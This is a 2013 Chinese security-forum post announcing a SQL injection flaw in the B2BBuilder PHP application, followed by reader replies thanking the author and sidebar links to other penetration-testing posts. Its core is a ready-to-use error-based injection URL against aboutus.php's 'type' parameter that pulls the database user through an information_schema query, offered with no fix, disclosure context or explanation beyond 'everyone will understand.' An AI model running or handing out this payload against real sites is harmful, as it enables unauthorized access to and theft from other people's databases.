[我爱t00ls] B2BBuilder 注入漏洞

2013-09-05 01:37:59 17 xiaoxiaoabc 4279

最近工作好忙,这不有时间了,看看php代码,不能生锈呢.

直接上利用方式,大家一看就懂.

http://localhost/b2b/aboutus.php?type=12345'  aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and 'z'='z

类别 Web安全

关于作者

xiaoxiaoabc68篇文章777篇回复

xiaoxiaoabc

评论17次

要评论？请先登录或注册

17楼

krystalvip
2016-7-8 18:36

收藏了，感谢楼主

回复|@ta|踩(0)|顶(0)
16楼

xia1234
2013-9-28 16:08

这个可以有。

回复|@ta|踩(0)|顶(0)
15楼

dullub
2013-9-27 23:06

为啥这套程序都下载下来啊

回复|@ta|踩(0)|顶(0)
14楼

—7℃
2013-9-10 18:45

看完了，就得回复下

回复|@ta|踩(0)|顶(0)
13楼

ji4nr3n
2013-9-10 18:26

感谢作者的无私奉献

回复|@ta|踩(0)|顶(0)
12楼

cc4ss
2013-9-10 17:12

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
11楼

kk_skipper
2013-9-7 09:08

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
10楼

yantou
2013-9-6 21:09

收了谢谢啊

回复|@ta|踩(0)|顶(0)
9楼

xiaoxiaoabc
2013-9-5 21:07

mlgb

回复|@ta|踩(0)|顶(0)
8楼

lmy
2013-9-5 19:34

支持原创，谢谢分享。

回复|@ta|踩(0)|顶(0)
7楼

cnxxxxcn
2013-9-5 15:21

这个可以呵呵~~~

回复|@ta|踩(0)|顶(0)
6楼

Yaseng
2013-9-5 15:05

支持下lz

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2013-9-5 10:29

呵呵，支持一下、、、、

回复|@ta|踩(0)|顶(0)
4楼

uuwhat
2013-9-5 09:01

感谢

回复|@ta|踩(0)|顶(0)
3楼

twygame
2013-9-5 08:56

牛BB的人啊。。求带。

回复|@ta|踩(0)|顶(0)
2楼

hiicome
2013-9-5 06:36

收下了。都不错的

回复|@ta|踩(0)|顶(0)
1楼

52pride
2013-9-5 02:02

沙发

回复|@ta|踩(0)|顶(0)

安全资讯关于个人挖矿的一个案件【T00ls法律讲堂第六十一期】

关键词行政/行政处理/虚拟货币/“挖矿”/责令整改/司法审查基本 ...

2025-12-22 16:17:04 11 1905

安全资讯开源编辑器Notepad++更新程序存在安全漏洞被劫持流量投毒请用户注意杀毒和更新

开源文本和代码编辑器 Notepad++ 日前被安全专家发现安全漏洞， ...

2025-12-12 16:51:19 8 2134

安全资讯MongoDB 存在严重未经身份验证的漏洞，可通过 zlib 压缩泄露敏感数据

漏洞通报：MongoDB 严重安全漏洞 (CVE-2025-14847)一个编号为 CV ...

2025-12-25 10:06:03 7 2053

安全资讯专访simeon：攻防深处，薪火相传【T00ls人物专访第二十期】

### 自我介绍simeon，前阿里巴巴集团安全部高级安全专家，曾就职 ...

2025-12-05 10:07:40 13 3231

渗透测试记一次SEO引流后门的webshell应急响应样本分析

写在最前：由于工作性质，不写具体事件前后经过，本贴只对攻击者 ...

2026-02-02 09:31:19 27 1335

精华推荐

渗透测试【保姆级教学】某金融app FRIDA hook加解密算法+jsrpc=乱杀

## 0x01 APP渗透测试因为是经过授权的测试，所以拿到的这个包是 ...

2023-03-16 19:10:08 92 29897

渗透测试WebShell系列(一)---XML

想来想去还是归结成一个系列吧，虽然说在现在各种讲究高大上的时 ...

2015-04-23 00:46:13 61 19586

渗透测试渗透测试某大型公司局域网

闲来无事，所以就想着搞搞自己单位的内网玩玩，过程分几大篇章1 ...

2014-10-27 14:20:47 92 26790

代码学习简单二开geacon_pro和cs实现内存加载frp

# 简单二开geacon_pro和cs实现内存加载frp---## 一.前言好久没发 ...

2023-07-20 09:35:11 22 1785

逆向破解利用python免杀cs shellcode

# 利用python免杀cs shellcode## 0x01 前言老方法，拓展了一下 ...

2020-02-13 11:30:06 100 9037

Top ↑

[我爱t00ls] B2BBuilder 注入漏洞

关于作者

评论17次

收藏了，感谢楼主

这个可以有。

为啥这套程序都下载下来啊

看完了，就得回复下

感谢作者的无私奉献

支持原创，谢谢分享。

支持原创，谢谢分享。

收了谢谢啊

mlgb

支持原创，谢谢分享。

这个可以 呵呵~~~

支持下lz

呵呵，支持一下、、、、

感谢

牛BB的人啊。。求带。

收下了。都不错的

沙发

热门文章

安全资讯关于个人挖矿的一个案件【T00ls法律讲堂第六十一期】

安全资讯开源编辑器Notepad++更新程序存在安全漏洞被劫持流量投毒 请用户注意杀毒和更新

安全资讯MongoDB 存在严重未经身份验证的漏洞，可通过 zlib 压缩泄露敏感数据

安全资讯专访simeon：攻防深处，薪火相传【T00ls人物专访第二十期】

渗透测试记一次SEO引流后门的webshell应急响应样本分析

最新回复

精华推荐

渗透测试【保姆级教学】某金融app FRIDA hook加解密算法+jsrpc=乱杀

渗透测试WebShell系列(一)---XML

渗透测试渗透测试某大型公司局域网

代码学习简单二开geacon_pro和cs实现内存加载frp

逆向破解利用python免杀cs shellcode

这个可以呵呵~~~

安全资讯开源编辑器Notepad++更新程序存在安全漏洞被劫持流量投毒请用户注意杀毒和更新